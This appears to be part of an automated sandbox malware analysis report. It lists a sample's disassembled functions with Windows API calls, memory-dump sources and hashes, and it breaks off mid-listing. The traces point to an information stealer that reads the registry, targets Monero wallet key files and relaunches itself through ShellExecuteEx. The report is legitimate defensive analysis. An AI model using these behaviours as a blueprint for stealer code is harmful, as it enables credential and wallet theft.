                              Function 008A9E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                              Download Yara Rule
                              APIs
                              • LocalAlloc.KERNEL32(00000040,?), ref: 008A9F41
                                • Part of subcall function 008BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008BA7E6
                                • Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$AllocLocal
                              • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                              • API String ID: 4171519190-1096346117
                              • Opcode ID: 2dc7b6906dfc4078dbb1168ce5b48310b7dfe81b46de15ccb2d8e8a9d6540bba
                              • Instruction ID: 44a9d9010dee76b8f1786385081a4e92475da76526f4c947b57734bfc487ae35
                              • Opcode Fuzzy Hash: 2dc7b6906dfc4078dbb1168ce5b48310b7dfe81b46de15ccb2d8e8a9d6540bba
                              • Instruction Fuzzy Hash: 71610E71900248EBDB28EFA8CC96FDD7775FF45304F008518E9099BA91DB746A05CB52
                              Function 008B40B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                              Download Yara Rule
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,0142D030,00000000,00020119,?), ref: 008B40F4
                              • RegQueryValueExA.ADVAPI32(?,0142EB18,00000000,00000000,00000000,000000FF), ref: 008B4118
                              • RegCloseKey.ADVAPI32(?), ref: 008B4122
                              • lstrcat.KERNEL32(?,00000000), ref: 008B4147
                              • lstrcat.KERNEL32(?,0142EB48), ref: 008B415B
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$CloseOpenQueryValue
                              • String ID:
                              • API String ID: 690832082-0
                              • Opcode ID: a23d4614b6e05c8e46801cea61b8cd1adef4ce06d00728c4e24fa9702d440fa8
                              • Instruction ID: f5ea63e0dad7486d39c86026849ddb923ca2932d3c9c99ee0a6b3946345385c1
                              • Opcode Fuzzy Hash: a23d4614b6e05c8e46801cea61b8cd1adef4ce06d00728c4e24fa9702d440fa8
                              • Instruction Fuzzy Hash: 6541BBB6D001086BDB14EBE4DC86FFE737DF798300F004558B7159A181EA75AB898B93
                              Function 008B6920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                              Download Yara Rule
                              APIs
                              • GetSystemTime.KERNEL32(?), ref: 008B696C
                              • sscanf.NTDLL ref: 008B6999
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 008B69B2
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 008B69C0
                              • ExitProcess.KERNEL32 ref: 008B69DA
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Time$System$File$ExitProcesssscanf
                              • String ID:
                              • API String ID: 2533653975-0
                              • Opcode ID: 40aec355a08fe165b8e974d7d1d5371de65ebbcff038299bd511f68da928700e
                              • Instruction ID: 1045c63916a2c3788a0266b8e24a79e6f29c63d12dca789db7912d0ba7f8c072
                              • Opcode Fuzzy Hash: 40aec355a08fe165b8e974d7d1d5371de65ebbcff038299bd511f68da928700e
                              • Instruction Fuzzy Hash: CD21CB75D14208ABCF08EFE8D9859EEB7B5FF58300F04852AE416E7250EB346619CBA5
                              Function 008B7E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 008B7E37
                              • RtlAllocateHeap.NTDLL(00000000), ref: 008B7E3E
                              • RegOpenKeyExA.ADVAPI32(80000002,0141B5B8,00000000,00020119,?), ref: 008B7E5E
                              • RegQueryValueExA.ADVAPI32(?,0142CFB0,00000000,00000000,000000FF,000000FF), ref: 008B7E7F
                              • RegCloseKey.ADVAPI32(?), ref: 008B7E92
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: 38fb588ec4c8132e712136c4591cfeec6200d6a660f25a7328275bb4d29cdbcb
                              • Instruction ID: b6db8303ff9402c75579f3de1252758f973a4da46735dcc06000f010e46d3a7a
                              • Opcode Fuzzy Hash: 38fb588ec4c8132e712136c4591cfeec6200d6a660f25a7328275bb4d29cdbcb
                              • Instruction Fuzzy Hash: 97113DB1A44249EBD710CBD4DD89FABBBB8FB44B10F104159F615EB380D77468018BA2
                              Function 008B9260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                              Download Yara Rule
                              APIs
                              • StrStrA.SHLWAPI(0142E6F8,?,?,?,008B140C,?,0142E6F8,00000000), ref: 008B926C
                              • lstrcpyn.KERNEL32(00AEAB88,0142E6F8,0142E6F8,?,008B140C,?,0142E6F8), ref: 008B9290
                              • lstrlen.KERNEL32(?,?,008B140C,?,0142E6F8), ref: 008B92A7
                              • wsprintfA.USER32 ref: 008B92C7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpynlstrlenwsprintf
                              • String ID: %s%s
                              • API String ID: 1206339513-3252725368
                              • Opcode ID: c262325fddf7712143534472ff30af41d2ba5b2b630a4b5f597ad734de19e5df
                              • Instruction ID: 84bbdca69a83204501755fd246c99cc800db51d4cdf3b4e33c180ecde47ce1bd
                              • Opcode Fuzzy Hash: c262325fddf7712143534472ff30af41d2ba5b2b630a4b5f597ad734de19e5df
                              • Instruction Fuzzy Hash: CE01A575500148FFCB04DFECC998EAE7BB9FB58354F108548F9099B205C671AE41DB92
                              Function 008A12A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 008A12B4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 008A12BB
                              • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 008A12D7
                              • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 008A12F5
                              • RegCloseKey.ADVAPI32(?), ref: 008A12FF
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: 4880c900c6c29f6c3e15e035f9f0250bd78fe447346f3cc662a8bc412488e86f
                              • Instruction ID: b4beb1bd30de63aba92cba24637eccb040bff4d8b7e7fc01788f7fea64f2753e
                              • Opcode Fuzzy Hash: 4880c900c6c29f6c3e15e035f9f0250bd78fe447346f3cc662a8bc412488e86f
                              • Instruction Fuzzy Hash: F201E1B9A40248BFDB14DFE4DC89FAEB7B8EB58701F108159FA05DB280D675AA018F51
                              Function 008BC84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: String___crt$Type
                              • String ID:
                              • API String ID: 2109742289-3916222277
                              • Opcode ID: 9df2bc4144788da144407dfe84232dd707c84d2bc8eb1b8c036d156c26f5e26b
                              • Instruction ID: 659d5d951d148949a0c26a257cbdc370d4d479476a7365af06b160f00def3e1e
                              • Opcode Fuzzy Hash: 9df2bc4144788da144407dfe84232dd707c84d2bc8eb1b8c036d156c26f5e26b
                              • Instruction Fuzzy Hash: 1341E67150075C5EEB218B288D85FFB7FE8FB45708F1444E8E98AC6282E2719A45CF61
                              Function 008B6630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                              Download Yara Rule
                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 008B6663
                                • Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788
                                • Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01428900,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
                                • Part of subcall function 008BA9B0: lstrcpy.KERNEL32(00000000), ref: 008BAA04
                                • Part of subcall function 008BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008BAA12
                                • Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 008B6726
                              • ExitProcess.KERNEL32 ref: 008B6755
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                              • String ID: <
                              • API String ID: 1148417306-4251816714
                              • Opcode ID: e7d5c4636700305feaf1a98ee92fc575518d43d95e83dbae16641ead25e32433
                              • Instruction ID: 6ce7aa68284e9569fbe28f3c3b307876718a7f339028a76d5a5d8ba6fbe9b80c
                              • Opcode Fuzzy Hash: e7d5c4636700305feaf1a98ee92fc575518d43d95e83dbae16641ead25e32433
                              • Instruction Fuzzy Hash: EF312DB1801218AADB18EB94DC91BDD7B7CFF14300F404199F215A6291DF746B49CF66
                              Function 008B87C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,008C0E28,00000000,?), ref: 008B882F
                              • RtlAllocateHeap.NTDLL(00000000), ref: 008B8836
                              • wsprintfA.USER32 ref: 008B8850
                                • Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesslstrcpywsprintf
                              • String ID: %dx%d
                              • API String ID: 1695172769-2206825331
                              • Opcode ID: e4ae1d051de5c86f5e35f346892ebd6eef9299bf5744b9c4a7c1b22074dc2170
                              • Instruction ID: 81c0b68861c33fb93aae23fe141e97c78bb95daf3551860b393ea2cccc6ef3d5
                              • Opcode Fuzzy Hash: e4ae1d051de5c86f5e35f346892ebd6eef9299bf5744b9c4a7c1b22074dc2170
                              • Instruction Fuzzy Hash: C021FEB1A44248AFDB04DFD4DD85FAEBBB8FB49711F104519F605EB280C779A9018BA2
                              Function 008B8D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,008B951E,00000000), ref: 008B8D5B
                              • RtlAllocateHeap.NTDLL(00000000), ref: 008B8D62
                              • wsprintfW.USER32 ref: 008B8D78
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesswsprintf
                              • String ID: %hs
                              • API String ID: 769748085-2783943728
                              • Opcode ID: 5ed4ecc9a91c637e7eb455aff0625e81eab0b8b9478dfae48bbe63ab8a176d21
                              • Instruction ID: 65d18f8d3add212fe5177e21684a6aa0b876139e8af1904ebda3dde31a996bd6
                              • Opcode Fuzzy Hash: 5ed4ecc9a91c637e7eb455aff0625e81eab0b8b9478dfae48bbe63ab8a176d21
                              • Instruction Fuzzy Hash: B3E08CB1A40208FBC700DFD4DC4AE697BB8EB08702F004098FD09CB280DA71AE018B92
                              Function 008AA260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788
                                • Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01428900,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
                                • Part of subcall function 008BA9B0: lstrcpy.KERNEL32(00000000), ref: 008BAA04
                                • Part of subcall function 008BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008BAA12
                                • Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905
                                • Part of subcall function 008B8B60: GetSystemTime.KERNEL32(008C0E1A,01429D18,008C05AE,?,?,008A13F9,?,0000001A,008C0E1A,00000000,?,01428900,?,\Monero\wallet.keys,008C0E17), ref: 008B8B86
                                • Part of subcall function 008BA920: lstrcpy.KERNEL32(00000000,?), ref: 008BA972
                                • Part of subcall function 008BA920: lstrcat.KERNEL32(00000000), ref: 008BA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 008AA2E1
                              • lstrlen.KERNEL32(00000000,00000000), ref: 008AA3FF
                              • lstrlen.KERNEL32(00000000), ref: 008AA6BC
